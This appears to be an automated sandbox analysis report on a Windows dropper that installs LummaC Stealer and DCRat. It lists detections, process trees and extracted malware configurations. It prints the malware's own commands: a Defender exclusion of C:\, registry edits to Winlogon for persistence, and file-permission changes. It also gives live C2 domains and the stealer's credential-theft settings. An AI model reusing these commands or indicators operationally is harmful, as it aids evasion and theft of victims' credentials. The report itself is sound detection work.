Edit tour

Windows Analysis Report
bFZYRLnRIz.exe

Overview

General Information

Sample name:	bFZYRLnRIz.exe renamed because original name is a hash value
Original sample name:	289f27e7a02f8e76ebf39d2c0c3f09e4.bin.exe
Analysis ID:	1461211
MD5:	289f27e7a02f8e76ebf39d2c0c3f09e4
SHA1:	fb404a7a85d5fb617436f73832e4716556756d6a
SHA256:	854d267aea33e8dc80021ac043b003ab7c6f99061e56e36572cba3548e6882c9
Tags:	dcratexelumma
Infos:

Detection

LummaC, DCRat, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected DCRat

Yara detected LummaC Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

bFZYRLnRIz.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\bFZYRLnRIz.exe" MD5: 289F27E7A02F8E76EBF39D2C0C3F09E4)

cmd.exe (PID: 6648 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cacls.exe (PID: 6812 cmdline: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" MD5: A353590E06C976809F14906746109758)

cmd.exe (PID: 6868 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7020 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\' MD5: 04029E121A0CFA5991749937DD22A1D9)

WmiPrvSE.exe (PID: 5936 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

choice.exe (PID: 6548 cmdline: choice /c y /n /t 10 /d y MD5: 1A9804F0C374283B094E9E55DC5EE128)

reg.exe (PID: 6604 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 6840 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

572stuOQ0pZG2Xj.exe (PID: 6792 cmdline: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe MD5: 43AF303E1F32CE8C477ABBFB07887EA2)

Bypass.exe (PID: 7004 cmdline: "C:\ProgramData\SoftwareDistribution\Bypass.exe" MD5: 93E99FB34AC2CD9D6E867E24DCAFB2AB)

Loader.exe (PID: 6712 cmdline: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe MD5: B6C3C00D7CF6D8D13F20DBC590A675AD)

RegAsm.exe (PID: 6960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

wscript.exe (PID: 2476 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["facilitycoursedw.shop", "doughtdrillyksow.shop", "disappointcredisotw.shop", "bargainnygroandjwk.shop", "injurypiggyoewirog.shop", "leafcalfconflcitw.shop", "computerexcudesp.shop", "publicitycharetew.shop", "backcreammykiel.shop"], "Build id": "LPnhqo--@Qudette"}

Threatname: DCRat

{"SCRT": "{\"J\":\"(\",\"H\":\"|\",\"9\":\"_\",\"T\":\"*\",\"s\":\"%\",\"S\":\"&\",\"O\":\">\",\"2\":\"@\",\"i\":\"!\",\"D\":\"$\",\"w\":\"#\",\"m\":\"^\",\"l\":\")\",\"y\":\"<\",\"I\":\";\",\"Y\":\".\",\"j\":\" \",\"1\":\"~\",\"0\":\"`\",\"n\":\",\",\"N\":\"-\"}", "PCRT": "{\"i\":\"%\",\"3\":\"#\",\"2\":\"-\",\"1\":\"<\",\"U\":\"@\",\"k\":\"`\",\"g\":\";\",\"B\":\"|\",\"Q\":\"_\",\"T\":\")\",\"Z\":\"^\",\"S\":\" \",\"c\":\"~\",\"0\":\"&\",\"s\":\">\",\"a\":\"*\",\"V\":\".\",\"M\":\"!\",\"j\":\",\",\"b\":\"(\",\"e\":\"$\"}", "TAG": "", "MUTEX": "DCR_MUTEX-uoO5gecs0KSSZDI3KaVh", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 0, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": true, "AD": false, "H1": "http://ck66916.tw1.ru/@==gbJBzYuFDT", "H2": "http://ck66916.tw1.ru/@==gbJBzYuFDT", "T": "0"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat	MALWARE_BAT_KoadicBAT	Koadic post-exploitation framework BAT payload	ditekSHen	0x2:$s1: &@cls&@set 0x5c:$s2: :~41,1%% 0x69:$s2: :~47,1%% 0x76:$s2: :~36,1%% 0x83:$s2: :~9,1%% 0x8f:$s2: :~63,1% 0x9e:$s2: :~51,1%% 0xb4:$s2: :~45,1%% 0xc1:$s2: :~28,1% 0xcf:$s2: :~20,1%% 0xdc:$s2: :~50,1%% 0xe9:$s2: :~1,1%% 0xf5:$s2: :~53,1%% 0x102:$s2: :~42,1%% 0x10f:$s2: :~13,1%% 0x11c:$s2: :~3,1%% 0x128:$s2: :~57,1%% 0x135:$s2: :~63,1%% 0x142:$s2: :~12,1%% 0x14f:$s2: :~24,1%% 0x15c:$s2: :~52,1%%
C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat	MALWARE_BAT_KoadicBAT	Koadic post-exploitation framework BAT payload	ditekSHen	0x2:$s1: &@cls&@set 0x58:$s2: :~44,1%% 0x63:$s2: :~26,1%% 0x77:$s2: :~33,1%% 0x82:$s2: :~53,1%% 0x8d:$s2: :~50,1% 0x9f:$s2: :~17,1%% 0xaa:$s2: :~47,1%% 0xb5:$s2: :~60,1%% 0xc0:$s2: :~7,1%% 0xd3:$s2: :~33,1%% 0xde:$s2: :~4,1%% 0xe8:$s2: :~10,1%% 0xf3:$s2: :~11,1%% 0xfe:$s2: :~61,1%% 0x109:$s2: :~14,1%% 0x114:$s2: :~44,1%% 0x11f:$s2: :~51,1%% 0x12a:$s2: :~36,1%% 0x135:$s2: :~8,1%% 0x13f:$s2: :~30,1%%
C:\ProgramData\SoftwareDistribution\Bypass.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\ProgramData\SoftwareDistribution\Bypass.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\SoftwareDistribution\Bypass.exe	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x1b6692:$x2: DCRat-Log# 0x40a6e:$x3: DCRat.Code 0x40292:$v1: Plugin couldn't process this action! 0x402dc:$v2: Unknown command! 0x1b66f0:$v4: Saving log... 0x1b670c:$v5: ~Work.log 0x1b59ef:$v8: %SystemDrive% - Slow 0x1b5a19:$v9: %UsersFolder% - Fast 0x1b5a43:$v10: %AppData% - Very Fast

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000005DB5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000002.4119735415.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000000F.00000000.1821021197.00000000007F2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000B.00000003.1818779277.0000021DBAF50000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: 572stuOQ0pZG2Xj.exe PID: 6792	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RegAsm.exe PID: 6960	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Bypass.exe PID: 7004	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: Bypass.exe PID: 7004	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.0.Bypass.exe.7f0000.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
15.0.Bypass.exe.7f0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.0.Bypass.exe.7f0000.0.unpack	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x1b6692:$x2: DCRat-Log# 0x40a6e:$x3: DCRat.Code 0x40292:$v1: Plugin couldn't process this action! 0x402dc:$v2: Unknown command! 0x1b66f0:$v4: Saving log... 0x1b670c:$v5: ~Work.log 0x1b59ef:$v8: %SystemDrive% - Slow 0x1b5a19:$v9: %UsersFolder% - Fast 0x1b5a43:$v10: %AppData% - Very Fast

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', ProcessId: 7020, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , ProcessId: 2476, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , ProcessId: 2476, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , ProcessId: 2476, ProcessName: wscript.exe

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6604, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" , ProcessId: 2476, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6868, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\', ProcessId: 7020, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN DCRat Initial Checkin Server Response M4 - Source IP: 92.53.96.121 - Destination IP: 192.168.2.4

Timestamp:	06/23/24-06:54:21.035775
SID:	2850862
Source Port:	80
Destination Port:	49745
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN DCRat Initial Checkin Server Response M4 - Source IP: 92.53.96.121 - Destination IP: 192.168.2.4

Timestamp:	06/23/24-06:56:28.389945
SID:	2850862
Source Port:	80
Destination Port:	49773
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN DCRat Initial Checkin Server Response M4 - Source IP: 92.53.96.121 - Destination IP: 192.168.2.4

Timestamp:	06/23/24-06:55:24.045906
SID:	2850862
Source Port:	80
Destination Port:	49762
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN DCRat Initial Checkin Server Response M4 - Source IP: 92.53.96.121 - Destination IP: 192.168.2.4

Timestamp:	06/23/24-06:57:31.268133
SID:	2850862
Source Port:	80
Destination Port:	49784
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://backcreammykiel.shop/api	Avira URL Cloud: Label: malware
Source: https://backcreammykiel.shop/apiPK	Avira URL Cloud: Label: malware
Source: https://backcreammykiel.shop/B	Avira URL Cloud: Label: malware
Source: leafcalfconflcitw.shop	Avira URL Cloud: Label: malware
Source: https://backcreammykiel.shop:443/api	Avira URL Cloud: Label: malware
Source: https://backcreammykiel.shop/s	Avira URL Cloud: Label: malware
Source: backcreammykiel.shop	Avira URL Cloud: Label: malware
Source: https://backcreammykiel.shop/l	Avira URL Cloud: Label: malware
Source: https://backcreammykiel.shop/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe

Avira: detection malicious, Label: HEUR/AGEN.1310064

Found malware configuration

Source: 15.0.Bypass.exe.7f0000.0.unpack	Malware Configuration Extractor: DCRat {"SCRT": "{\"J\":\"(\",\"H\":\"\|\",\"9\":\"_\",\"T\":\"\",\"s\":\"%\",\"S\":\"&\",\"O\":\">\",\"2\":\"@\",\"i\":\"!\",\"D\":\"$\",\"w\":\"#\",\"m\":\"^\",\"l\":\")\",\"y\":\"<\",\"I\":\";\",\"Y\":\".\",\"j\":\" \",\"1\":\"~\",\"0\":\"`\",\"n\":\",\",\"N\":\"-\"}", "PCRT": "{\"i\":\"%\",\"3\":\"#\",\"2\":\"-\",\"1\":\"<\",\"U\":\"@\",\"k\":\"`\",\"g\":\";\",\"B\":\"\|\",\"Q\":\"_\",\"T\":\")\",\"Z\":\"^\",\"S\":\" \",\"c\":\"~\",\"0\":\"&\",\"s\":\">\",\"a\":\"\",\"V\":\".\",\"M\":\"!\",\"j\":\",\",\"b\":\"(\",\"e\":\"$\"}", "TAG": "", "MUTEX": "DCR_MUTEX-uoO5gecs0KSSZDI3KaVh", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 0, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": true, "AD": false, "H1": "http://ck66916.tw1.ru/@==gbJBzYuFDT", "H2": "http://ck66916.tw1.ru/@==gbJBzYuFDT", "T": "0"}
Source: 13.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["facilitycoursedw.shop", "doughtdrillyksow.shop", "disappointcredisotw.shop", "bargainnygroandjwk.shop", "injurypiggyoewirog.shop", "leafcalfconflcitw.shop", "computerexcudesp.shop", "publicitycharetew.shop", "backcreammykiel.shop"], "Build id": "LPnhqo--@Qudette"}

Multi AV Scanner detection for domain / URL

Source: backcreammykiel.shop	Virustotal: Detection: 8%	Perma Link
Source: https://backcreammykiel.shop/api	Virustotal: Detection: 16%	Perma Link
Source: facilitycoursedw.shop	Virustotal: Detection: 11%	Perma Link
Source: doughtdrillyksow.shop	Virustotal: Detection: 12%	Perma Link
Source: disappointcredisotw.shop	Virustotal: Detection: 9%	Perma Link
Source: computerexcudesp.shop	Virustotal: Detection: 13%	Perma Link
Source: https://backcreammykiel.shop:443/api	Virustotal: Detection: 16%	Perma Link
Source: publicitycharetew.shop	Virustotal: Detection: 14%	Perma Link
Source: leafcalfconflcitw.shop	Virustotal: Detection: 9%	Perma Link
Source: backcreammykiel.shop	Virustotal: Detection: 8%	Perma Link
Source: injurypiggyoewirog.shop	Virustotal: Detection: 9%	Perma Link
Source: bargainnygroandjwk.shop	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: bFZYRLnRIz.exe	Virustotal: Detection: 56%			Perma Link
Source: bFZYRLnRIz.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: bFZYRLnRIz.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: facilitycoursedw.shop
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: doughtdrillyksow.shop
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: disappointcredisotw.shop
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: bargainnygroandjwk.shop
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: injurypiggyoewirog.shop
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: leafcalfconflcitw.shop
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: computerexcudesp.shop
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: publicitycharetew.shop
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: backcreammykiel.shop
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: TeslaBrowser/5.5
